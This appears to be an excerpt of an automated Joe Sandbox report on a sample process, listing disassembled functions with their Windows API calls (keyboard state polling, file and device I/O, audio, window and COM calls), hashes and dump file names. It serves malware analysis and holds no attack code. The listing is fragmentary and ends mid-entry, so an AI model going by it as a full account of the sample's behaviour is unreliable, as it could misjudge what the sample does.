                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1939486746-1459072770
                • Opcode ID: df428181b487b6ca134c328391e3aacf070c041f56d3c612206f45db6c987682
                • Instruction ID: 6b195aa2c9f6336ffafdca077c9ef5c902c2ee7ae30af843de780af8fc1d17f4
                • Opcode Fuzzy Hash: df428181b487b6ca134c328391e3aacf070c041f56d3c612206f45db6c987682
                • Instruction Fuzzy Hash: 7D4127726502047BEB10BBA49C47FBF77ECDF55310F0408A9F941A61C2EB749A01D6A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C14678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C1469A
                • _wcslen.LIBCMT ref: 00C146C7
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C146F7
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C14718
                • RemoveDirectoryW.KERNEL32(?), ref: 00C14728
                • DeviceIoControl.KERNEL32 ref: 00C147AF
                • CloseHandle.KERNEL32(00000000), ref: 00C147BA
                • CloseHandle.KERNEL32(00000000), ref: 00C147C5
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 1149970189-3457252023
                • Opcode ID: 6ee1a27b1c35c513148e26272e418c58bf838e5da350a056d3a0e048218499e3
                • Instruction ID: 1ee61429cfbee1d66124764ecb8dbff99c13f4a184c0e668be75f29eb7c8b5b5
                • Opcode Fuzzy Hash: 6ee1a27b1c35c513148e26272e418c58bf838e5da350a056d3a0e048218499e3
                • Instruction Fuzzy Hash: C3318FB1910209ABDB219B60DC44FEF37BDEF8A754F1041A9F619960A0EB709B849B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0F228 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C0F289
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0F29F
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0F2B0
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C0F2C2
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C0F2D3
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: SendString$_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 2420728520-1007645807
                • Opcode ID: 037341a487446e4d5e88e8ecc5c6e2c349a9e8d2c22bae488debf4fe2bbfade3
                • Instruction ID: 95bb9d6fa47d376aeb48955cf3885fe39d2f825b8950a34eb1a5654c0ce19aee
                • Opcode Fuzzy Hash: 037341a487446e4d5e88e8ecc5c6e2c349a9e8d2c22bae488debf4fe2bbfade3
                • Instruction Fuzzy Hash: 6711C631A5415979DB30A7A1DC8AEFF7BFCEFD2B14F0009797411A20D5EAA01E45C5B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0A86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 00C0A8EE
                • SetKeyboardState.USER32(?), ref: 00C0A959
                • GetAsyncKeyState.USER32(000000A0), ref: 00C0A979
                • GetKeyState.USER32(000000A0), ref: 00C0A990
                • GetAsyncKeyState.USER32(000000A1), ref: 00C0A9BF
                • GetKeyState.USER32(000000A1), ref: 00C0A9D0
                • GetAsyncKeyState.USER32(00000011), ref: 00C0A9FC
                • GetKeyState.USER32(00000011), ref: 00C0AA0A
                • GetAsyncKeyState.USER32(00000012), ref: 00C0AA33
                • GetKeyState.USER32(00000012), ref: 00C0AA41
                • GetAsyncKeyState.USER32(0000005B), ref: 00C0AA6A
                • GetKeyState.USER32(0000005B), ref: 00C0AA78
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: f4454c87b0a3ad5ddef735693d840ba7a0c46afd63b84b34caaa4a851a665e93
                • Instruction ID: 565efa97568ae8d92d09b4ed00f3e5e74e1cebf858d6a5291eda36aaf11a8a83
                • Opcode Fuzzy Hash: f4454c87b0a3ad5ddef735693d840ba7a0c46afd63b84b34caaa4a851a665e93
                • Instruction Fuzzy Hash: 3551FA30A047846AFB35E7B089147EABFB49F11380F088699D5D25B1C3DA649F4CDB63
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C06555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                Download Yara Rule
                APIs
                • GetDlgItem.USER32 ref: 00C06571
                • GetWindowRect.USER32 ref: 00C0658A
                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C065E8
                • GetDlgItem.USER32 ref: 00C065F8
                • GetWindowRect.USER32 ref: 00C0660A
                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C0665E
                • GetDlgItem.USER32 ref: 00C0666C
                • GetWindowRect.USER32 ref: 00C0667E
                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C066C0
                • GetDlgItem.USER32 ref: 00C066D3
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C066E9
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C066F6
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: ca10c3724c988f8a3e5fa5e205863e050ad833e2e4c6274ffcec8cf4ea7dea23
                • Instruction ID: 98678d25e679a6f6b5e63eb05ab037c4beb8c3ce905f70bd1138e91efe2b5d8c
                • Opcode Fuzzy Hash: ca10c3724c988f8a3e5fa5e205863e050ad833e2e4c6274ffcec8cf4ea7dea23
                • Instruction Fuzzy Hash: 9D510CB1A10215AFDB08CF68DD89BAEBBB5FB48310F108129F91AE72D4D7719E14CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA20D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA21E4: GetWindowLongW.USER32(?,000000EB), ref: 00BA21F2
                • GetSysColor.USER32(0000000F), ref: 00BA2102
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ColorLongWindow
                • String ID:
                • API String ID: 259745315-0
                • Opcode ID: 53b70480501beb38736ce3b8deb606e0652f5a2ec7b95d1b18cf6c512b82b19a
                • Instruction ID: d40149642b1662a679e98359e12b6ec33dc337b5d1617f1e1a9235b9f94d1ab2
                • Opcode Fuzzy Hash: 53b70480501beb38736ce3b8deb606e0652f5a2ec7b95d1b18cf6c512b82b19a
                • Instruction Fuzzy Hash: E4417C31204640AFDB205B2DEC89BBE3BE5EB56731F144685FAA6972E1C73199429B10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C348F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C3499A
                • CreateCompatibleDC.GDI32(00000000), ref: 00C349A1
                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C349B4
                • SelectObject.GDI32(00000000,00000000), ref: 00C349BC
                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C349C7
                • DeleteDC.GDI32(00000000), ref: 00C349D1
                • GetWindowLongW.USER32(?,000000EC), ref: 00C349DB
                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00C349F1
                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00C349FD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                • String ID: static
                • API String ID: 2559357485-2160076837
                • Opcode ID: b7147db0d3a148dc19e01837a4ef61efe188949edb1c129308d963b092d1ec34
                • Instruction ID: 2d8e415ff3560a74aecaf6492381b7ac054ffac8ea5c2c1f885d64dbc18cba33
                • Opcode Fuzzy Hash: b7147db0d3a148dc19e01837a4ef61efe188949edb1c129308d963b092d1ec34
                • Instruction Fuzzy Hash: A3316E32120215ABDF119FA4EC09FDE3BBCFF09725F110211FA6AA60A0D735E821DB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C2458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 00C245B9
                • CoInitialize.OLE32(00000000), ref: 00C245E7
                • CoUninitialize.OLE32 ref: 00C245F1
                • _wcslen.LIBCMT ref: 00C2468A
                • GetRunningObjectTable.OLE32(00000000,?), ref: 00C2470E
                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C24832
                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C2486B
                • CoGetObject.OLE32(?,00000000,00C40B64,?), ref: 00C2488A
                • SetErrorMode.KERNEL32(00000000), ref: 00C2489D
                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C24921
                • VariantClear.OLEAUT32(?), ref: 00C24935
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                • String ID:
                • API String ID: 429561992-0
                • Opcode ID: 3328975c9af1e1443bdc86d6e0a155ffd302da2355d7202df3f83cddb01c81de
                • Instruction ID: 93b4ae8635291876cd041f47acc0943deb27dba98629c914ec5ffd067847e304
                • Opcode Fuzzy Hash: 3328975c9af1e1443bdc86d6e0a155ffd302da2355d7202df3f83cddb01c81de
                • Instruction Fuzzy Hash: ABC144B1608311AFC704DF28D884A2BBBE9FF89748F14495DF99A9B250DB30ED45CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C183F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32(00000000), ref: 00C1844D
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C184E9
                • SHGetDesktopFolder.SHELL32(?), ref: 00C184FD
                • CoCreateInstance.OLE32(00C40CD4,00000000,00000001,00C67E8C,?), ref: 00C18549
                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C185CE
                • CoTaskMemFree.OLE32(?,?), ref: 00C18626
                • SHBrowseForFolderW.SHELL32(?), ref: 00C186B1
                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C186D4
                • CoTaskMemFree.OLE32(00000000), ref: 00C186DB
                • CoTaskMemFree.OLE32(00000000), ref: 00C18730
                • CoUninitialize.OLE32 ref: 00C18736
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                • String ID:
                • API String ID: 2762341140-0
                • Opcode ID: 16e7bbf1502f1233618686f9ee8e2393f29fdc64484e068e6961c1a277aab606
                • Instruction ID: 9880b56a3d68a8e30c00775e2f9cd7ea7d8198b47b8ba1d9d5446fe16bbd092b
                • Opcode Fuzzy Hash: 16e7bbf1502f1233618686f9ee8e2393f29fdc64484e068e6961c1a277aab606
                • Instruction Fuzzy Hash: BEC11C75A04209EFCB14DFA4C884DAEBBF5FF49344B148198F51A9B261CB30EE85DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C00318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                Download Yara Rule
                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C0033F
                • SafeArrayAllocData.OLEAUT32(?), ref: 00C00398
                • VariantInit.OLEAUT32(?), ref: 00C003AA
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C003CA
                • VariantCopy.OLEAUT32(?,?), ref: 00C0041D
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C00431
                • VariantClear.OLEAUT32(?), ref: 00C00446
                • SafeArrayDestroyData.OLEAUT32(?), ref: 00C00453
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C0045C
                • VariantClear.OLEAUT32(?), ref: 00C0046E
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C00479
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: 42dddf950336e98922ba2915184944b58b79a0acc463fca54c2ba5a958a90888
                • Instruction ID: b8c980bbb1b7180ebd1fbb778f024a2403ae177fc7492911157f0c42bfee9788
                • Opcode Fuzzy Hash: 42dddf950336e98922ba2915184944b58b79a0acc463fca54c2ba5a958a90888
                • Instruction Fuzzy Hash: 04415175A10219DFCF00DFA4D848AEEBBB9FF48344F118469E956A7261C730EA45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C3A8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BA2441: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA2452
                • GetSystemMetrics.USER32 ref: 00C3A926
                • GetSystemMetrics.USER32 ref: 00C3A946
                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C3AB83
                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C3ABA1
                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C3ABC2
                • ShowWindow.USER32(00000003,00000000), ref: 00C3ABE1
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00C3AC06
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C3AC29
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                • String ID:
                • API String ID: 1211466189-3916222277
                • Opcode ID: 8e52320d200d17a11e0a8b5b99854d2df094e833cc0931e3e995e7170cb96561
                • Instruction ID: f392fc4cd7ee2479a7dcb8978e12cf57b043f23b5dcbda609d231d1666ca80e6
                • Opcode Fuzzy Hash: 8e52320d200d17a11e0a8b5b99854d2df094e833cc0931e3e995e7170cb96561
                • Instruction Fuzzy Hash: 90B1AB31610219DFDF14CF69C985BAE7BF2FF44705F088069EC999B295D730AAA0CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C18AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                Download Yara Rule
                APIs
                • GetLocalTime.KERNEL32(?), ref: 00C18BB1
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C18BC1
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C18BCD
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18C6A
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18C7E
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18CB0
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C18CE6
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18CEF
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CurrentDirectoryTime$File$Local$System
                • String ID: *.*
                • API String ID: 1464919966-438819550
                • Opcode ID: dedf1d8dcbcbd1970e5d5aeb0c716e306aa9e68c7fec0d6ca4d76fa56e2b4d11
                • Instruction ID: 455e06c4a0e1d47454b01f2aa3778db202ada6073635a88a5efe3c334abd6b11
                • Opcode Fuzzy Hash: dedf1d8dcbcbd1970e5d5aeb0c716e306aa9e68c7fec0d6ca4d76fa56e2b4d11
                • Instruction Fuzzy Hash: 206139B25083459FC710EF24C844A9FB7E8FF8A310F04895DF99997251DB31EA89CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C345A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0$F
                • API String ID: 161812096-3044882817
                • Opcode ID: 6a013c574b63808959320951859aca4ed40d4b11b2aba7df402961ae0a78843a
                • Instruction ID: 13ac076b6c08b275b2eaa2550e26a00e01f463c7e266787cb7d093cfa20011f1
                • Opcode Fuzzy Hash: 6a013c574b63808959320951859aca4ed40d4b11b2aba7df402961ae0a78843a
                • Instruction Fuzzy Hash: E6414AB5611209EFDB18CF64E855BAE7BB5FF4A314F140028FA5697350D730AA20CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C027F4
                • GetDlgCtrlID.USER32 ref: 00C027FF
                • GetParent.USER32 ref: 00C0281B
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C0281E
                • GetDlgCtrlID.USER32 ref: 00C02827
                • GetParent.USER32(?), ref: 00C0283B
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C0283E
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
